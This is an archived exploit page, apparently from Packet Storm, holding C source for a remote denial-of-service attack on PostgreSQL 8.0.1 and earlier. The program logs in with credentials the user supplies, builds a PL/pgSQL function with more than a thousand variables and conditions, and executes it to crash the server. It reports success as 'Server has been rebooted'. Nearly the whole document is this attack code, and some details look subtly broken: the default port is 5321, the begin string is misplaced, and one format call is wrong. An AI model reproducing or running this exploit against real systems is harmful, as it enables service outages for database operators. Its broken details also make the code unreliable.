Twenty Year Anniversary

pgsql_reboot.c

pgsql_reboot.c
Posted Nov 2, 2005
Authored by unl0ck, choix | Site exploiterz.org

PostgreSQL remote reboot exploit for version 8.01 and below.

tags | remote
MD5 | 88ac57a73b879ce9479508b6eb6fc58b

pgsql_reboot.c

Change Mirror Download
/* PostgreSQL Remote Reboot <=8.01 
* writen by ChoiX [choix@unl0ck.org]
* (c) unl0ck team
* info: Server can be rebooted only if plpgsql language is switched on.
* To compilate exploit you should have "libpq" library on your box
* and use command $ cc -o pgsql_reboot pgsql_reboot.c -I/usr/local/pgsql/include -L/usr/local/pgsql/lib -lpq
* Root exploits will be released later, coz now it's very dangerous to release it.
*
*
*
*/
#include <stdio.h>
#include <getopt.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <libpq-fe.h>

#define DEFAULT_PORT "5321"
#define DEFAULT_DB "postgresql"
#define FUNC_NAME "uKt_test"
#define TABLE_NAME "unl0ck_table"

char str[4000];
char create[]="CREATE OR REPLACE FUNCTION %s RETURNS integer AS $$\n";
char declare[] = "DECLARE\n";
char com[] = "\t--%\n";
char varible_REC[] = "\trec RECORD;\n";
char varible_var[] = "\tvar%d varchar := \'BBBB\';\n";
char begin[] = "BEGIN\n";
char select_1[] = "SELECT INTO rec FROM %s WHERE\n";
char select_2[] = "var%d = AAAA AND\n";
char select_3[] = "var1029 = AAAA;\n";
char end[] = "END\n";
char finish[] = "$$ LANGUAGE plpgsql\n";


void usage(char *name){
printf("PostgreSQL Remote DoS <=8.0.1\n");
printf("writen by ChoiX [choix@unl0ck.org]\n");
printf("(c) Unl0ck Research Team [info@unl0ck.org]\n");
printf("Usage: %s -H <host_address> [-P <port>] -u <user_name> -p <password> [-d <database_name>] \n", name);
printf("Default port = %s\nDefault dbname = %s\n", DEFAULT_PORT, DEFAULT_DB);
exit(0);
}

int make_str();

int main(int argc, char *argv[]){
char opt;
char *host = NULL, *port = NULL, *user = NULL, *password = NULL, *dbname = NULL;
struct hostent *he;
PGconn *conn;
PGresult *res;

while((opt = getopt(argc, argv, "H:P:u:p:d:")) != EOF){
switch(opt){
case 'H':
host = optarg;
break;
case 'P':
port = optarg;
break;
case 'u':
user = optarg;
break;
case 'p':
password = optarg;
break;
case 'd':
dbname = optarg;
break;
default:
usage(argv[0]);
break;
}
}
if(host == NULL) usage(argv[0]);
if(user == NULL) usage(argv[0]);
if(password == NULL) usage(argv[0]);
if(port == NULL) port = DEFAULT_PORT;
if(dbname == NULL) dbname = DEFAULT_DB;

printf("\tPostgreSQL Remote DoS <=8.0.1\n");
printf("[*] Host/Port: %s/%s\n", host, port);
printf("[*] DBname/User/Password: %s/%s/%s\n", dbname, user, password);

conn = PQsetdbLogin(host, port, NULL, NULL, dbname, user, password);
if(PQstatus(conn) == CONNECTION_BAD){
PQfinish(conn);
printf("[-] Cannot connect to the database\n");
exit(1);
}
printf("[+] Connected to the database\n");

make_str();
printf("[+] Command has been generated\n");
res = PQexec(conn, str);
if (PQresultStatus(res) == PGRES_TUPLES_OK){
printf("[+] Command has been sent\n");
}
if(PQstatus(conn) == CONNECTION_BAD){
printf("[+] Server has been rebooted\n");
exit(0);
} else {
printf("[-] Server hasnt been rebooted\n");
exit(0);
}
}

int make_str(){
char temp[100];
int i;
int len = sizeof(temp) -1;

//write char create[]
snprintf(temp, len, create, FUNC_NAME);
strcpy(str,temp);
//write char declare[]
snprintf(temp, len, begin);
strcat(str, temp);
//write char varible_REC[]
snprintf(temp, len, varible_REC);
strcat(str, temp);
//write char varible_var[]
for(i = 0;i < 1029;i++){
snprintf(temp, len, varible_var, i);
strcat(str, temp);
}
//write char begin[]
snprintf(temp, len, begin);
strcat(str, temp);
//write char select_1[]
snprintf(temp, len, select_1, TABLE_NAME);
strcat(str, temp);
//write char select_2[]
for(i = 0;i < 1028;i++){
snprintf(temp, len, select_2, i);
strcat(str, temp);
}
//write char select_3[]
snprintf(temp, len, select_3);
strcat(str, temp);
//write char end[]
snprintf(temp, len, temp);
strcat(str, temp);
//write char finish[]
snprintf(temp, len, finish);
strcat(str,temp);

return 0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    15 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close